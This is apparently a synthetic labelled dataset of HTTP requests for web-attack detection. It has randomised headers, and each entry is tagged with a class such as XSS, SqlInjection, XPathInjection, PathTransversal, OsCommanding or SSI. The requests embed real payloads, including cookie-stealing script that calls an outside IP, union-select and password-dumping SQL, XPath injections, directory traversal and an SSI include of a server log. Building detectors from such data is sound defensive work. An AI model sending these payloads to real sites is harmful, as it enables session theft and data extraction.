TE: trailers,trailers,trailers
Trailer: Range
User-Agent: saynh8Hr/2.7.1
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9544x100
Via: 2.0 56.118.144.33
Transfer-Encoding: compress
Upgrade: rRlEh/1.9
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 001394948859071824
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42065
Start - Id: 46665
class: XSS
GET /ub2w/tRenyhj./eha35Yaekl/0llthvido.html?3cidOD=eq%25mm9d%3AE&olcevalKqdhopen=5072&idmKDii=7hsock_streamulzt&RwlBecyi6=lLld778qNA&9oSsetrr8a6ts=5673275&2sdatic=tN6aiI&A9Qj=wiseScalea&esl8tae=6537 HTTP/1.0
Host: 181.253.108.83:7036
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: isn-Aciaels;q=0.6, nRiv-eDrym, dhi4b-rz, ef-nASe, dmrs-va
Cache-Control: no-transform
Client-ip: 99.60.100.87
Cookie: YTXEMj4tmpNTG=etsud;nLtstieEarai=480;Eh=<xml    id  =  " X   "    ><a    ><b   >&lt;script  >[window.open('http://247.166.173.136/an.aspx'+document.cookie);]&lt;/script >;</b   ></a  ></xml>;vrAnf0wsnn=0ahn;ipqn=aobe8
Cookie2: $Version="486"
Date: Thu, 17 Dec 09 16:14:53 UTC
ETag: "5zQ01NH@dpA_r7g8e"
Expect: euToil
From: os7ddt@2hedt3.cz
If-Modified-Since: Tue, 20 Apr 10 17:10:17 UTC
If-Unmodified-Since: Sun, 13 Feb 05 22:30:50 CET
If-Match: *
If-None-Match: "D.qlHhdZPu01Y_RtlCI"
If-Range: "3w5qskhneCb7bLj5NH6X"
Max-Forwards: 20
MIME-Version: 9.3
Pragma: 8=oXwjh
Proxy-Authorization: Digest nc=BdfD5Ba4
Authorization: Digest username="oaseou"
Range: -618819
Referer: http://eenya.com/asco3eso.php
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.8 (Windows; U; Win 9x 7.5; qw-CE; rv:0.1.1) Gecko/94702449
UA-CPU: PowerPC
UA-OS: Linux
UA-Color: color32
Via: 7.8 249.60.46.84
Transfer-Encoding: gzip
Upgrade: ceosue/5.9, raei/2.6, ehArr/9.3, qen/7.8, Udv/2.3
Warning: 212 www.ee2Ee.js "iuaewa4tc" 
X-Forwarded-For: 216.174.136.108
X-Serial-Number: 64753281
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46665
Start - Id: 42989
class: OsCommanding
GET /8t8xnu/ca7ysblS0otmz8qheel/Ba1iframetmphLadminxmlI8fPQv/ei9nsns4dtyo7m/h7tyDnia3asI/wmHo9s4gpamea/29rnrhrtfed/h1sock_streampassthruORwinntd4V0d.jpg?etru5aKeh=e6sOselect&nDwnehHEn4=557927&ti2iLa=039&t0mdc28nols4onr=linkgH&oz@Zy=nwh388YH2 HTTP/1.0
Host: www.aBataath.cz
Connection: close
Accept: */*
Accept-Charset: euc-jp;q=0.1, iso-8859-15;q=0.5
Accept-Encoding: 
Accept-Language: t-oEuin;q=0.3, en2irMiN-sunwsr;q=0.4, reet-kleoae;q=0.0
Cache-Control: max-stale=49366
Cookie: uV8ddelete7acceptn3PTc=| id    |
Cookie2: $Version="30"
Date: Thu, 21 May 09 10:35:52 UTC
ETag: W/"RPi3rU4k9KFfwHHc"
From: aHce@4d3e4.cz
If-Modified-Since: Sat, 14 Jan 06 08:12:03 CET
If-Unmodified-Since: Thu, 01 Mar 07 04:13:49 UTC
If-Match: *
If-Range: Wed, 30 Apr 08 12:09:07 GMT
Proxy-Authorization: Basic ZVRmaHJuaWQ6Y2F0cnZvMHk=
Authorization: Digest nc=AE271DFd
Referer: http://www.80nbs.st/bmdbm/vythTam.fgf
TE: chunked;q=0.5
User-Agent: lSOTpNW http://www.bqNiSwn.com
UA-Disp: 0159,4616,16
UA-OS: Win98
Via: 8.4 165.76.213.178, 0.0 22.251.188.61, Ukor/0.8 www.auonl.js
Transfer-Encoding: identity
Upgrade: ncne/4.6, sNsieo/1.8, oafee/3.1
----: ---------------------------------------------

null

End - Id: 42989
Start - Id: 49706
class: XPathInjection
GET /bH9MhLbqZ/eZxiphpvV8Ato/3Rntgao2ihetb9dt/winnt_LomYNnHc8/pwgX1b/das8t13tatPa.mspx?hnntcny=0&okiednrUd4bj=04056&dYban=ve6erit%27++or+++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28++++i++%2Bj+%2B++k+++%2B++++l%2B++++1%29%5D+++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+%27hnthbbee%27%3D%27++troo%27+or&mnujeTc00edah=458&os=u+n&pint4ansnidhCq=rtau&ld7utxseAut4srg=70164064&ssphao=eoON&2boxatenrohmi=934633305&slTbcuwbT=9970218&dlnta=+Jig7 HTTP/1.0
Host: 190.37.168.43
Connection: uwetat
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, deflate;q=0.1
Accept-Language: wsdu-tb;q=0.8, otu-nTiEr, tdo-foK;q=0.2
Cache-Control: max-age=4
Client-ip: 250.131.219.97
Cookie: e5eoeZla=atzReAoEmQXD
Cookie2: $Version="241"
Date: Mon, 18 Apr 05 22:33:51 GMT
ETag: W/"s3klw_r.kke6tQh"
Expect: aap7xdn=Hphoh
From: tmHtei@9Eaetn4.de
If-Modified-Since: Thu, 27 Aug 09 20:38:51 CET
If-Unmodified-Since: Sat, 23 Jan 10 20:38:06 UTC
If-Match: "gKihrz2Ljm20D5_6fGfE"
If-None-Match: "M2o.KHXAyB@bXeNbgnSV"
If-Range: Wed, 14 Apr 10 24:42:24 UTC
Max-Forwards: 097
MIME-Version: 3.5
Pragma: 7='tAw'
Proxy-Authorization: NTLM ZG50ZWdyZGNnZ2hwYXJseXRtd2Zlc2JpYWVzeXJ3dmFuQmhwYTFhc29FZW8=
Authorization: Digest opaque="3udRemTa"
Range: -5492,963-312971
Referer: http://www.s0mirr.fr/e2air.tiff
TE: trailers
Trailer: Expect
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 9.7; rl-hr; rv:7.0.8) Gecko/01635246
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6094x1402
Via: aqsel/8.4 www.ulQel.png, HTTP/8.7 176.64.112.146, 3.6 www.ejgs.shtml
Transfer-Encoding: Mhni
Upgrade: raae/3.1, 4st9/2.3, Oaex/8.8, tlaiew/4.1
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 13247958
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49706
Start - Id: 36174
class: PathTransversal
GET /a7F3O2dzBK0.HMb/ldf7HeMR_Jn1.QlFciG.htm?ta3nacmoesnt=r%3Dfr%2Fttlas&evu9igishNai=c7Qd2cM&eno5i=ipositionstjoytNi1h9nI&eadope4xmR=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Ftara%2Fsttitrst%2Fen%2Ftendlier.aspx HTTP/1.1
Host: www.AoaTitkos.de
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew, hz-gb-2312, iso-8859-9;q=0.5, iso-8859-6;q=0.0, windows-1251
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 164.195.241.61
Cookie: -mXlink=dpCZRN_nMm;enesoblA3=760
Cookie2: $Version="99"
Date: Sat, 17 May 08 03:14:35 UTC
ETag: W/"rLPib2j-x4Vz7kREpS67"
Expect: 100-continue
From: esie@ntoatbni.fr
If-Modified-Since: Fri, 05 Oct 07 02:46:39 UTC
If-Unmodified-Since: Thu, 18 Sep 08 12:05:23 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 21 Dec 07 20:57:22 GMT
Max-Forwards: 042
Pragma: 4tmgrr='w'
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=MD5
Range: 462654-
Referer: http://www.orri19h.be/tcxi5gne/jlsr.jpeg
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/2.7 (compatible; Konqueror/2.6; WinNT; heoWd; 0i4reys; sieLpred)
UA-Disp: 4206,422,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5546x388
Via: HTTP/4.6 www.atafH.jpeg, eoos/3.6 207.98.75.21:96, nhel/4.5 www.oog1Als.jpeg:4444
Transfer-Encoding: compress
Upgrade: sBc8h/5.5, Lnio/4.6, olj9p/0.5
Warning: 282 www.mar3eOer.jpg "Gzeol4" 
X-Forwarded-For: 214.211.159.226
X-Serial-Number: 4255971850
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36174
Start - Id: 47984
class: XSS
GET /rofCHZ8wKL3i@VvhvipT/7S4strT8DFMf/2tsk9BLerGUwrroiPE/w5Q0VxF.Gjlf.mdb?o7cL9=%3Cdiv++style++++%3D+%22++width%3A+++++expression%28%5Bwindow.open%28%27http%3A%2F%2F59.223.113.154%2Flltr.mspx%27%2Bdocument.cookie%29%3B%5D%29%3B+%22+%3E&87um_R0=boot.iniu+n&wrPnPPAtnK1=6474331&rhoioee=01479&a2ymfgga=ydieiow4&y4cdu7ee8tsgje=e3n2ma HTTP/1.0
Host: www.hrmbsia.be
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, x-mac-chinesetrad, iso-8859-2;q=0.4
Accept-Encoding: gzip, deflate;q=0.2
Accept-Language: irni-v, pfA-etxvdsrF;q=0.4, c3Tc0h-na
Cache-Control: max-stale
Client-ip: 200.176.81.45
Cookie: id6hre1Nsx=i9;oc3aR=soetorthkcnEg;bbgsoundPwinntmQobjectayu=4
Cookie2: $Version="140"
Date: Wed, 30 Jul 08 09:20:32 UTC
ETag: W/".PIa5x900H8gqvCc"
Expect: lFikdnif=fhohwa1
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Sat, 12 Aug 06 14:18:51 GMT
If-Unmodified-Since: Thu, 05 Oct 06 16:49:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 8.2
Pragma: EagllIad='siAl'
Proxy-Authorization: Digest nc=b2c271ed
Authorization: 1tsywn ctbe=freu
Range: 147-9,-924229,1-59450
Referer: /oi3r4to/efeee/tdeTreo.zip
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 7.1; bs-eu; rv:0.8.3) Gecko/32603935
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: FTP/5.0 54.23.240.57, u8torl/5.1 21.169.15.46, FTP/5.9 www.eror.jpeg
Transfer-Encoding: gzip
Upgrade: ncS/0.9, oneft/1.4, g2ddat/1.2, wrNtr/6.4, r7ss/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 15.6.38.77
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47984
Start - Id: 49742
class: XPathInjection
GET /ehb8topantdepdysr/o9-jAv_Y3gub1FwGe/hVydLaSeIo7YlbYv8vZA/EIVJ.msf?eonLssOst0=73&4eu5tihnciAQ=%3Fzer&ltttehnfcxla=685&ehSypsdpS=pApypmxYn&0cG1ftp7La=cohes%27++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++%27sidt%27++++%3D++%27&iosoanOndc=N%29Dme&tnsnfimshnobt=7742049&ja=re9s0qbeuidteh&lmer5lh=Inee&fnezetZotneyg=181186280 HTTP/1.1
Host: www.Eehrlhab.fr:99
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-ce, iso-8859-5;q=0.5, gb2312
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 24.134.122.55
Cookie: jPuu=v0o$s|ciy t;fom=hAncr;jbeR4ttAan=45977217
Cookie2: $Version="05"
Date: Fri, 24 Apr 09 11:55:37 UTC
ETag: W/"iJ0-PiEXMIemk_dG"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 26 Feb 06 03:23:39 CET
If-Unmodified-Since: Mon, 17 Sep 07 19:33:54 CET
If-Match: "zFGa_ZtFIeAuOvrGVK"
If-None-Match: *
If-Range: "l8UmGJBfikP0i.2"
Max-Forwards: 76
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic emVnbmU6b3RjUmRiYQ==
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -1702
Referer: http://www.tnada.fr/2dfs/sAO7/edootno/ctaed.swf
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: eicwri/1.5.2.3
UA-CPU: x86
UA-Disp: 676,3592,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4005x8626
Via: 8.9 www.r1oO.html:9630, FTP/0.6 169.37.150.117:903, 0.9 www.dulcobw8.htm:446
Transfer-Encoding: identity
Upgrade: rsmt7a/2.2, ysy/1.0
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49742
Start - Id: 41634
class: SqlInjection
GET /ywBmkIv9/c1utee6/7seawenDWvrrrCinjJW/ueovonsacrs/s26bs3/ekCgdWztqCc/dJxSHibElAe9WEL5d5rP/ZttV8iC4.cgi?enretraaug=%27+++union+select+%40%40version%2C1%2C1%2C1--&a70t2=fmgqwf9&awtm=98632294&runAd=2720671&aneae1ctua=22818865&idleDfecilsEj=tss11prenteT HTTP/1.0
Host: www.eamheei.cz
Connection: iltahe
Accept: video/*, video/quicktime, video/mpeg;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.4
Accept-Language: o7h-hne7tc, aod3ssce-giqdne, re-n, g5-lehod;q=0.4
Cache-Control: max-stale=12
Client-ip: 228.176.17.121
Cookie: zuncLSi5A-=91519;WgVDTRMvbscriptzsh=wZuqX;cn5Igtsyhavon=m;h2fsns=dc4msosnpobinyn:;7u=ramrueyea~;iEtnetf=formaeeaouue
Cookie2: $Version="70"
Date: Sun, 25 Apr 10 23:41:54 UTC
ETag: "-cn@c9fe6TG-hI_N3z@F"
Expect: 100-continue
From: xrtw@gme1s0.it
If-Modified-Since: Tue, 18 Nov 08 15:47:04 GMT
If-Unmodified-Since: Fri, 04 Nov 05 17:29:12 GMT
If-Match: "Dv-.r08jh0juv3vdy"
If-None-Match: "pFWq6PSAn5-afpfyuQ1k"
If-Range: Fri, 22 May 09 14:04:44 UTC
Max-Forwards: 4
MIME-Version: 5.2
Pragma: lte8urmw='oc7eNria'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM ZWhyUGlnb2ExYWw0Y3dpZWNudHhlZGNlbm5JYnJpMWRoNHA=
Range: 53962-110288
Referer: /hsylehe/stbi/9robanI/meBt2qO/uS8v.swf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/2.1 (X11; U; Solaris 3.1; bz-fd; rv:3.1.7) Gecko/40422841
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: 7.1 37.150.156.240, aayE/0.2 99.81.231.24:7227, 9.6 80.152.60.92
Transfer-Encoding: dznn; abnmIl=swhT
Upgrade: ncT/8.9, 9ri4/6.4
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 239.30.161.125
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41634
Start - Id: 49505
class: XPathInjection
GET /8Gxxs3/ANh2PI92J3khCx/dslZVGzK/w83j/D.e5Ao4SO/pGprinupeechernc/7iitloE/NbFcEdrop/yZC_Hej/CfoXetclcs3A.ps_.cfm?d7phrenus6mi=hialink&XnhEfromuI=coeivo%27+++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28i+%2B+++j++%2Bk+%2B++++l+%2B++++1%29%5D+%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++++%27mrmh%27+%3D+++%27++++tdaoi%27+or&nepspJ98DR=c%3EroschildEeodisheu&eldlsh=bssunionzei&dsnh0fco=oos3uEeTEEr&4tnl5fi4vroH=sz&7UT3t=lips5&aihaeyt=np0zDPS HTTP/1.1
Host: 165.64.144.13:80
Connection: etS50eui
Accept: */*;q=0.9
Accept-Charset: ks_c_5601-1987;q=0.2, windows-1250;q=0.8, windows-1254
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 95.13.200.201
Cookie: NTp5pchildgax1M=uyscriptnnnl y
Cookie2: $Version="61"
Date: Tue, 24 Feb 09 04:16:49 UTC
ETag: W/"r2AbaBUZcYbH-sHcVU8"
Expect: 100-continue
From: amlp2vta@vfese.gov
If-Modified-Since: Tue, 11 Jan 05 12:16:56 UTC
If-Unmodified-Since: Sun, 13 Dec 09 20:57:57 UTC
If-Match: *
If-None-Match: *
If-Range: "-9BPWH.4WlUwV-5q-HX2"
Max-Forwards: 125
MIME-Version: 7.2
Pragma: js='e0gc'
Proxy-Authorization: Basic aGQ4dWVuOmlFYXM=
Authorization: ieer sfiotoe=ytcS
Range: 2-801463,7709-,5-5829
Referer: /htltne/jnhs/4pre.jpeg
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.4 (X11; U; SunOS sun4u 8.9; mg-se; rv:5.1.5) Gecko/93125721
UA-CPU: StrongARM
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4726x3292
Via: 5.4 www.nhzio0eo.gif, 2.6 www.wfwftt.jpeg, i9i/1.1 www.toeOtt.js
Transfer-Encoding: dhce; idx1biho=ietT5Dtt
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 063 21.35.61.71 "elaoim3oti" 
X-Forwarded-For: 113.38.28.52
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49505
Start - Id: 41756
class: SqlInjection
GET /pz/kg0uE3CLEEyy@/1PU8pO/adQfgbmKbgR.shtml?slhsar=n%40%40gjptL2G&Hfacleyn=%27%3B++begin+++declare++%40ret+++++varchar%288000%29++++set+++++%40ret%3D%27%3A%27++++select+++++%40ret%3D%40ret%2B%27+%27%2BeR5t%2B%27%2F%27%2Bpassword+++from+cpihgdi+++++where+ge%3E%40ret+++++select+++%40ret+++++as++ret+++++into+++++foo++++end--&pai=544898 HTTP/1.0
Host: www.cetrsd.biz:2
Connection: keep-alive
Accept: audio/basic;q=0.4, audio/basic;q=0.5, image/*
Accept-Charset: shift_jis, windows-1251, iso-8859-8;q=0.4, x-mac-arabic;q=0.5, windows-874
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=22
Client-ip: 122.67.58.101
Cookie: RHwnodeuZlyo=eNins~eean-c<tal:4o
Cookie2: $Version="416"
Date: Tue, 31 Jul 07 15:16:06 UTC
ETag: "4K2mazPqrLOm65B"
Expect: osevnd
From: lehFo@eioiwni.cz
If-Modified-Since: Sun, 27 Jan 08 13:17:56 UTC
If-Unmodified-Since: Mon, 04 Jan 10 18:15:48 GMT
If-Match: "1MwpV.LPxdC.m21KXIjh"
If-None-Match: "bZkSgga4XYE2Gs59"
If-Range: Sun, 17 Apr 05 20:31:27 CET
Max-Forwards: 421
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic cGI2bXI6c2l0eHNubVM=
Authorization: n3isd braheurh=llinDn26
Range: -69404,-1
Referer: http://wlono3m4.net/eofe.bin
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.1 (compatible; orezhefa; Win98; 4heeaObreg; inas; orsxaf)
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8272x964
Via: 1.9 65.212.198.44:49484, FTP/9.6 204.103.111.215, 0.8 45.66.246.243
Transfer-Encoding: deflate
Upgrade: 0rei4d/2.0, titan/4.1, nsj/8.7, ngq/4.4
Warning: 486 www.rgnso.shtml:1 "waivD4wgcsuaoDeedtp" "Fri, 12 Feb 10 10:10:14 GMT"
X-Forwarded-For: 140.12.238.50
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41756
Start - Id: 45027
class: PathTransversal
PUT /t3/cs5rtarrqdnpomhccs/d-fX6h3/ecceyrehsetth/qT6RDcop5efY7/ws0ib/l1x04tpmysF@3UT14/elCRqgUPY1VF/FrdX9v1NCAR6.tiff? HTTP/1.1
Content-Length: 286
Content-Language: rb
Content-Encoding: compress
Content-MD5: dDNiYXZSYWVzY2VjaWVJQw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 01 Oct 08 18:35:19 GMT
Host: www.xlyQnR.de
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, iso-8859-8-i;q=0.3
Accept-Encoding: ../../../usr/dsqqdsqsd.xml
Accept-Language: Adlriea-erdmag;q=0.9, n-edr0qw;q=0.5, iat3os-ti
Cache-Control: no-store
Cookie2: $Version="833"
If-Modified-Since: Sat, 02 Aug 08 08:15:41 UTC
If-Unmodified-Since: Tue, 17 Aug 04 09:24:51 UTC
If-Match: "iROY9aW4pt7JO1-tnTEX"
If-None-Match: "Dl7LeV_kAKWODJy"
MIME-Version: 5.7
Referer: http://wnmulEn.uk/elfLS/eiar.dll
TE: trailers
User-Agent: Mozilla/9.6 (Windows; U; WinNT 9.1; we-cg; rv:7.3.1) Gecko/67119988
Via: HTTP/1.6 140.188.104.51
X-Serial-Number: 20788
----: ------------------------------------------------

lSms9aIvocT=fnti;dDKui&eemoho=wtcdveaf&qaair0naofdeHao=s\z78tslopenqea%&htaermbeNhYEn=tHn&edYitIohmhojlfd=6816142&1UbsdivV3T6=nf1a&Mz67236Jjx=671&Mvoionu=/ow ANhrRc=stki&vh8taqRos8a=t/%sP&mhh=H5execandehok3th~ldE adca&gbgi=25405&eytrwnaernice1e=[iws|e|etdivtv$al

End - Id: 45027
Start - Id: 41392
class: SqlInjection
PUT /nlnqt/dVGk3rtIErqn/mAqC.8/otfUU.js? HTTP/1.1
Content-Length: 96
Content-Language: gi,nsarrOl1,ar3
Content-Encoding: compress
Content-Location: http://www.5pfwq.st/ahnknmp.php3
Content-MD5: a3VkMWdlSTRycW1iVGV0Nw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Dec 05 19:26:51 GMT
Last-Modified: Thu, 03 Feb 05 20:45:59 GMT
Host: www.rHeph.com
Connection: tyeO
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.8
Cache-Control: max-age=6
Client-ip: 65.244.212.38
Cookie: ihnte1afytgnrlH=rygo@yvC55J;qNsu4ramn=76182;DlovanzceGmneia=8
Cookie2: $Version="98"
Date: Thu, 18 Nov 04 06:47:15 CET
ETag: "lIiRlIPKte_9Hpgpj"
Expect: Ezwosie
From: eoiypoA@6niCt.fr
If-Modified-Since: Sun, 11 Sep 05 03:08:01 UTC
If-Unmodified-Since: Mon, 31 Mar 08 15:25:14 UTC
If-Match: *
If-None-Match: "DE@@fpJUAhddfz._DH"
If-Range: Wed, 07 May 08 03:15:46 CET
Max-Forwards: 5062
MIME-Version: 2.2
Pragma: al0Eeeso=0i
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM dm9sZk1jT250TGh3c3pveWlSaWRuYmV0YnJzRnJyOXJ0bGFlYXQ0
Range: 711-
Referer: http://www.sd0h.be/riedte5B/a9Idbd.fgf
TE: chunked;q=0.2
Trailer: Upgrade
User-Agent: Mozilla/0.3 (Windows; U; Win98 9.9; mG-fa; rv:0.5.6) Gecko/99272988
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1178x5140
Via: FTP/2.1 www.9gMd.gif:81, 0.4 8.74.59.228, FTP/8.4 www.Rijrdrou.jpg
Transfer-Encoding: identity
Upgrade: vtba/8.2, hnytoe/8.1, aWaG0t/9.1, Ins/7.8, icoct/4.7
Warning: 978 www.aeers.png "pstsl2qua0E" "Sat, 06 Mar 10 21:32:52 GMT"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

TdnhsybLamhn=OR 57603323921=57603323921&m1si=-2s48pco&CH5ZB__aXd=432643&iperlbodytxZhdn=enS|

End - Id: 41392
Start - Id: 48097
class: XSS
GET /e0/n9jGZUuPO1@3/c0v-/BbgsoundS/nuwMg1/tthr6zeL/tl/tevteaceAtmdOFe/pCL4r.shtml?52uisoko2eb09=uhorm&9dRmW3eipEde4u=793175&Tgzmm=Anl&oSdssaNdte=%3Ciframe++++src++%3D++%22++++vbscript%3A%5Balert+%28%27Zsjxlad8%27%29%3B%5D%22++++%3E HTTP/1.0
Host: 152.49.8.223
Connection: eGj4n
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.9, deflate;q=0.8, gzip, identity, compress;q=0.1
Accept-Language: *
Cache-Control: r1t8e=cyd
Client-ip: 148.235.193.134
Cookie: Net5fcit6yE=wascPhshda;r0y4=tlR6ae4Uu;imtkuc8aiiwlo=iscey;Roh0wi9w= iE45c?L8ozenomct;ee1cenwewc=ts5iatOotbEi;vNmbeX=rheaels
Cookie2: $Version="657"
Date: Wed, 31 Aug 05 03:18:39 CET
ETag: "_kZg_@Z9twta657-o@Y"
Expect: 0oBnuh=bntvena
From: aIafz@wvamBrQ.uk
If-Modified-Since: Sun, 22 Oct 06 10:09:38 GMT
If-Unmodified-Since: Tue, 15 Nov 05 13:40:12 CET
If-Match: "hl-JMd7x-0VVMkU_ya4"
If-None-Match: *
If-Range: Mon, 03 Mar 08 21:30:01 GMT
Max-Forwards: 4797
MIME-Version: 6.3
Pragma: dhiwoohl='hccrn'
Proxy-Authorization: ijdeiT kiao=mtjnUr
Authorization: ny9cr sjeOhe=rf9a
Range: -179295,540225-63
Referer: /osmna/anpaihla/csnbRsai/hhre0Mn/0evj.swf
TE: trailers,trailers
Trailer: TE
User-Agent: ehakRnsn23Its
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6001x2247
Via: HTTP/0.0 154.129.237.167:80326, 7.9 203.207.173.125, FTP/7.7 166.255.101.160
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 628 213.163.87.234 "snanhhatel" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48097
Start - Id: 39641
class: SSI
GET /vz-WCY5X8bdeT1Wt7L/Ttnaptfnlnedit7o/czTl-75eec/w3taaateNmeOe/e.uhdaY9vt43vs_c/ikMuIq@0vgs.swf?btaTni8nr=%3C%21--+++++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E&i00meSnmgl4aNe=IIye3Ojfa3lacdxd&uAoeoisL=846&nTwhereOW3IW=a8QtV%40&ndpso=me%25t+ote%5CzH7j+&ecQbif@iX=d03gjgFefrin&hHoi63=8591562 HTTP/1.1
Host: www.sarosLi.it:80
Connection: iuewhm
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=69452
Client-ip: 96.129.208.142
Cookie: j59gAit4ento=4;msoudT=dooeAwy7nc5dsett
Cookie2: $Version="2"
Date: Tue, 29 May 07 17:29:08 UTC
ETag: W/"A2.v71CkZHD7@G96Mx"
Expect: 100-continue
From: ae07on@oist3.org
If-Modified-Since: Tue, 06 May 08 07:20:35 GMT
If-Unmodified-Since: Sun, 13 Jan 08 07:08:26 GMT
If-Match: "5649_BVinmGcR92K"
If-None-Match: "p2I.-tjfa.t25jpE"
If-Range: Wed, 17 Sep 08 12:56:30 CET
Max-Forwards: 5
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: s1CGtm oInfrS=tsiskn
Range: -3
Referer: /ohenl/wfsids/lido/Omotn/nSst.nsf
TE: trailers,gzip;q=0.0
Trailer: Authorization
User-Agent: tnetryst/7.2.3.9.4
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: 9.8 www.nxdsog.jpeg:792, 8.1 179.52.196.3, 6.8 21.9.135.254:153
Transfer-Encoding: identity
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
